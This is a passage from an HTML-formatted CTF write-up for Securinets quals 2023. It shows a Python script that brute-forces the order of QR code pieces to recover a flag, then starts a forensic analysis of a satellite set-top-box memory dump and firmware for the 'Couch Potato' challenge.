class=&#34;string&#34;&gt;&amp;quot;&amp;lt;--&amp;gt;&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(position)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    change_chunk(&lt;span class=&#34;built_in&#34;&gt;int&lt;/span&gt;(position[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]),&lt;span class=&#34;built_in&#34;&gt;int&lt;/span&gt;(position[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;image.save(ASSEMBLED_IMAGE)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Yeah It works fine!! We recover the QRCode!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/Assembled.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;But something is wrong here! It sills broken and We can’t scan it 😦. But why? are we have any problem with our solver?&lt;/p&gt;
&lt;p&gt;Ah No. I get it! We have 36 pieces and each line from  &lt;code&gt;help.txt&lt;/code&gt;  have correspond to 2 pieces! So we have to find 18 lines, right ?&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@Securinets:~$ &lt;span class=&#34;built_in&#34;&gt;wc&lt;/span&gt; -l help.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Oh no we have 15 lines, So we have 6 pieces we need to re-order them by ourselves! Now I get why the Author said Help  &lt;code&gt;LITTLE BIIT&lt;/code&gt; . He left the 6 pieces to deal with it.&lt;/p&gt;
&lt;p&gt;In this case we need to do a bruteforce to all the combinasions. We have 6 pieces, so we have 6! possibility&lt;br&gt;
and 6! = 720 which is possible to deal with it using a python script. Let’s re-order the 6 pieces each time and try to scan the QRCode. Once the QRCode is readable, we will stop our program!&lt;/p&gt;
&lt;p&gt;Let’s get the flag now !!! Let’s DO IT NOW! We’re so close!&lt;/p&gt;
&lt;p&gt;So the 1st thing that we need to do it is that we need to get the index of missed pieces. The  &lt;code&gt;help.txt&lt;/code&gt;  is the key!&lt;/p&gt;
&lt;p&gt;Let’s generate an array that have the order (index) of the missed pieces. Then we use our  &lt;code&gt;change_chunck()&lt;/code&gt;  method and try all the combinaisons using the  &lt;code&gt;itertools&lt;/code&gt; . Finally try to scan the QRCode each time using the  &lt;code&gt;qrtools&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Let’s install the qrtools first&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@Securinets:~$ sudo apt-get install python3-qrtools&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now let’s write down our last script (I Hope) :&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;36&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;37&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;38&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;39&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;40&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;41&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;42&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;43&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;44&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;45&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;46&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;47&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;48&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;49&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;50&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;51&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;52&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;53&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;54&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;55&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;56&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;57&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;58&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;from&lt;/span&gt; PIL &lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; Image&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; qrtools&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;from&lt;/span&gt; itertools &lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; permutations&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;qr=qrtools.QR()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;def&lt;/span&gt; &lt;span class=&#34;title function_&#34;&gt;missed_data&lt;/span&gt;():&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    not_missed=[]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    data=&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;quot;help.txt&amp;quot;&lt;/span&gt;,&lt;span class=&#34;string&#34;&gt;&amp;quot;r&amp;quot;&lt;/span&gt;).read().split(&lt;span class=&#34;string&#34;&gt;&amp;quot;\n&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;built_in&#34;&gt;len&lt;/span&gt;(data)-&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        position=data[i].split(&lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;lt;--&amp;gt;&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        not_missed.append(&lt;span class=&#34;built_in&#34;&gt;int&lt;/span&gt;(position[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        not_missed.append(&lt;span class=&#34;built_in&#34;&gt;int&lt;/span&gt;(position[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(not_missed)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    missed=[]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;,&lt;span class=&#34;number&#34;&gt;36&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; &lt;span class=&#34;keyword&#34;&gt;not&lt;/span&gt; (i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; not_missed):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            missed.append(i)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;return&lt;/span&gt; missed&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;chuncks=missed_data()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(chuncks)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;H_SPLIT=&lt;span class=&#34;number&#34;&gt;6&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;W_SPLIT=&lt;span class=&#34;number&#34;&gt;6&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SPLITTED_IMAGE=&lt;span class=&#34;string&#34;&gt;&amp;quot;Assembled.png&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;height,width=&lt;span class=&#34;number&#34;&gt;720&lt;/span&gt;,&lt;span class=&#34;number&#34;&gt;720&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;permutations=&lt;span class=&#34;built_in&#34;&gt;list&lt;/span&gt;(permutations(chuncks,&lt;span class=&#34;number&#34;&gt;6&lt;/span&gt;))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;image=Image.&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;quot;Assembled.png&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pixels=image.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;def&lt;/span&gt; &lt;span class=&#34;title function_&#34;&gt;change_chunk&lt;/span&gt;(&lt;span class=&#34;params&#34;&gt;index1,index2&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos1=[]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos1.append(index1 % W_SPLIT)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos1.append(index1 // W_SPLIT)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos2=[]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos2.append(index2 % W_SPLIT)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    pos2.append(index2 // W_SPLIT)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    height_chunk=height // H_SPLIT&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    width_chunk= width // W_SPLIT&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt; (width_chunk):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; j &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt; (height_chunk):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            aux= pixels[pos1[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]*width_chunk+i,pos1[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]*height_chunk+j]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            pixels[pos1[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]*width_chunk+i,pos1[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]*height_chunk+j]= pixels[pos2[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]*width_chunk+i,pos2[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]*height_chunk+j]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            pixels[pos2[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]*width_chunk+i,pos2[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]*height_chunk+j]= aux&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;#x27;[-] Trying to fix the QRCode and Getting the flag ...&amp;#x27;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;built_in&#34;&gt;len&lt;/span&gt;(permutations)):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    comb=&lt;span class=&#34;built_in&#34;&gt;list&lt;/span&gt;(permutations[i])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    change_chunk(comb[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;],comb[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    change_chunk(comb[&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;],comb[&lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    change_chunk(comb[&lt;span class=&#34;number&#34;&gt;4&lt;/span&gt;],comb[&lt;span class=&#34;number&#34;&gt;5&lt;/span&gt;])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    image.save(&lt;span class=&#34;string&#34;&gt;&amp;quot;Final.png&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; qr.decode(&lt;span class=&#34;string&#34;&gt;&amp;quot;Final.png&amp;quot;&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(qr.data)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;keyword&#34;&gt;break&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And we got the flag as an output Here!!! BINGO! We get the flag!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/finally.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And of course the QRCode is saved! And this is our QRCode!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://github.com/4n6nk8s/quals-2023-write-ups/raw/main/Raf-Hide/Final.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;blockquote Every_Fr4Me_H4S_HiS_own_S7ory=&#34;&#34;&gt;
&lt;p&gt;The Final flag is : Securinets&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&#34;couch-potato&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#couch-potato&#34;&gt;#&lt;/a&gt; Couch Potato&lt;/h2&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/jHut52F.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;It’s past one, I was probably sleeping in front of my screen, I’m not even sure if I was awake for a bit or not, I’m not even sure if I’m dreaming or not… All I know is that I left the device on my favorite channel and that piece of crap failed me. Agh I need to fix it now. It is no longer responding to the commands I give it, and it is no longer showing my favorite channel! I hate my life, can you help me fix it?&lt;/p&gt;
&lt;p&gt;I am looking for three stuff:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;What nonsense was I watching the night the device failed me?&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;I might need the Up and Down key codes in NEC 32-bit format?&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;The expiration date of my IPTV subscription.&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Flag formal: &lt;strong&gt;Securinets{show_name_00UP1234_DOWN1234_YYYYMMDD}&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9hZG1pZGEwdWk=&#34;&gt;adm &amp;amp; mida0ui&lt;/span&gt;&lt;/p&gt;
&lt;h3 id=&#34;attachment-2&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#attachment-2&#34;&gt;#&lt;/a&gt; Attachment&lt;/h3&gt;
&lt;p&gt;A file called  &lt;code&gt;dump.bin&lt;/code&gt;  was provided in a zip. Weighing 8 MB. Dating back to February the 1st, 2020. 1:07 AM.&lt;/p&gt;
&lt;p&gt;Another file is what seems to be an updated firmware for the device,  &lt;code&gt;Firmware.bin&lt;/code&gt;  weighing 4 MB. And dating back to August the 25th, 2020.&lt;/p&gt;
&lt;p&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2RyaXZlL2ZvbGRlcnMvMVRHTkFPV0taWmJDelp1Vklta2xBMThJSF9jVXZ0a055P3VzcD1zaGFyaW5n&#34;&gt;Download Link&lt;/span&gt;&lt;/p&gt;
&lt;h3 id=&#34;analysis&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#analysis&#34;&gt;#&lt;/a&gt; Analysis&lt;/h3&gt;
&lt;p&gt;A Couch potato is a lazy guy that sits in front of the TV screen, indicating that we are dealing with a console, set-top-box STB or Digital Video Recorder DVR and not a PCI card satellite/Tuner card or a computer. The user mentioned that he was watching his favorite channel when he fall asleep which make it more likely an STB, or a receiver for simplicity.&lt;br&gt;
This also means that the show name we are looking for was broadcasted in his favorite channel.&lt;/p&gt;
&lt;p&gt;The user also mentioned that the device failed him, which means that the device is not responding to the commands he is sending to it. Kind of talking about a control unit, or that’s clearly a remote control that has some keys malfunctioning, specifically the UP and DOWN arrow keys as we know.&lt;/p&gt;
&lt;p&gt;On other hand, the user is suspecting that the IPTV subscription was the thing behind the interruption of his channel. This means that the IPTV subscription was a service provided by the device itself or maybe a third party service. This also means that the STB we’re dealing with is a hybrid device, meaning that it can receive satellite signals and also IPTV, making it a 2nd generation STB and there are plenty in the market today, for third world countries.&lt;/p&gt;
&lt;p&gt;However, the user could be mistaken as the channels that you can shortlist in the favorites are more likely to be satellite channels, hence the IPTV subscription is not the reason behind the interruption of his favorite channel rather than the satellite signal itself or the cardsharing service he is using.&lt;/p&gt;
&lt;p&gt;With all that in mind, we can start our information gathering phase.&lt;/p&gt;
&lt;h3 id=&#34;information-gathering&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#information-gathering&#34;&gt;#&lt;/a&gt; Information Gathering&lt;/h3&gt;
&lt;p&gt;TL;DR.&lt;/p&gt;
&lt;p&gt;The thing is devices like this are hard to find in UK, Europe and the US. Unlike Africa and Asia. That’s because in European countries and the US, they are mostly banned due to the fact that they are used for cardsharing and IPTV piracy. However, in Africa and Asia, they are still widely used and sold.&lt;/p&gt;
&lt;p&gt;So where to look? These devices are not open source nor they have some kind of documentation is to where to look in their ROMs. Satellite forums, subreddits, and Facebook groups are good resources and some deep search would yield some useful tools and details to deal with dump. We kind of need to know how the memory is splitted. The file is indeed a ROM/EEPROM snapshot, so it has a mapping of the memory. We just need to know where the information part is, channel list is, and applications or services are.&lt;/p&gt;
&lt;p&gt;The mapping generally includes the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Bootloader&lt;/li&gt;
&lt;li&gt;Kernel or maincode&lt;/li&gt;
&lt;li&gt;User data&lt;/li&gt;
&lt;li&gt;Menu&lt;/li&gt;
&lt;li&gt;…&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each at specific offsets and specific lengths. The user data is the most important part as it contains the channel list.&lt;/p&gt;
&lt;p&gt;Keep in mind that if the IPTV subscription was provided by the device itself, then the expiration date could be stored in the device itself or their renewal website. If the IPTV subscription was provided by a third party service, then the expiration date is stored in the third party service database or user panel. In both cases, we need to find the device serial number or MAC address to be able to identify the device and the user. I believe that how they are likely to be stored in the memory dump rather than a plain expiration date.&lt;/p&gt;
&lt;h3 id=&#34;resources&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#resources&#34;&gt;#&lt;/a&gt; Resources&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly93d3cuc2F0ZWxsaXRlcy5jby51ay9mb3J1bXMv&#34;&gt;https://www.satellites.co.uk/forums/&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly93d3cucmVkZGl0LmNvbS9yL3NhdGVsbGl0ZS8=&#34;&gt;https://www.reddit.com/r/satellite/&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly93d3cudHVuaXNpYS1zYXQuY29tL2ZvcnVtcy8=&#34;&gt;https://www.tunisia-sat.com/forums/&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9zYXQtdW5pdmVyc2UuY29tLw==&#34;&gt;https://sat-universe.com/&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;tools&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#tools&#34;&gt;#&lt;/a&gt; Tools&lt;/h3&gt;
&lt;p&gt;HexWorkshop / HxD Editor is a good tool to start with. It is a hex editor that can be used to view and edit files in hexadecimal and binary formats. It is a good tool to start with as it can be used to view the memory dump and search for strings. It can also be used to search for patterns and hex values.&lt;/p&gt;
&lt;h3 id=&#34;writeup-2&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#writeup-2&#34;&gt;#&lt;/a&gt; Writeup&lt;/h3&gt;
&lt;p&gt;First, let’s investigate the dump file.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;NCRCBootloader&lt;/code&gt;  is the start point, which is the bootloader used for these chipsets as indicated in the Hex Editor screen:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ALI3329&lt;/li&gt;
&lt;li&gt;ALI3606&lt;/li&gt;
&lt;li&gt;ALI3601&lt;/li&gt;
&lt;li&gt;ALI3511&lt;/li&gt;
&lt;li&gt;ALI3510&lt;/li&gt;
&lt;li&gt;ALI3516&lt;/li&gt;
&lt;li&gt;ALI3618&lt;/li&gt;
&lt;li&gt;ALI3821&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/vSB9IGX.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Devices with those chipset have these brands &lt;em&gt;Starsat, Sunplus, Tiger, StarMax, Geant, Mediastar, QMAX, AzAmerica, Samsat and many more…&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;And all of their built-in subscriptions are part of &lt;strong&gt;Gosat&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Now, to actually find the specific brand and model, we need to inspect the firmware update file.&lt;/p&gt;
&lt;p&gt;To clear things up, the memory dump serves for user data mainly the channels and services as I said while the firmware update file will indicate the remote control being used.&lt;/p&gt;
&lt;p&gt;The memory dump is a mapping and can be splitted manually and further investigated. However the firmware is encrypted, you can tell by a first glance, no strings or something in there, and can’t help us much to delve into the remote control unit in use.&lt;/p&gt;
&lt;p&gt;Time to google for a way to decrypt such chipset firmware. Let’s use the keyword  &lt;code&gt;ALI3329&lt;/code&gt;  or  &lt;code&gt;ALI3511&lt;/code&gt;  as they are the most common chipset used in these devices and combine the search with decrypt or unpack tool.&lt;/p&gt;
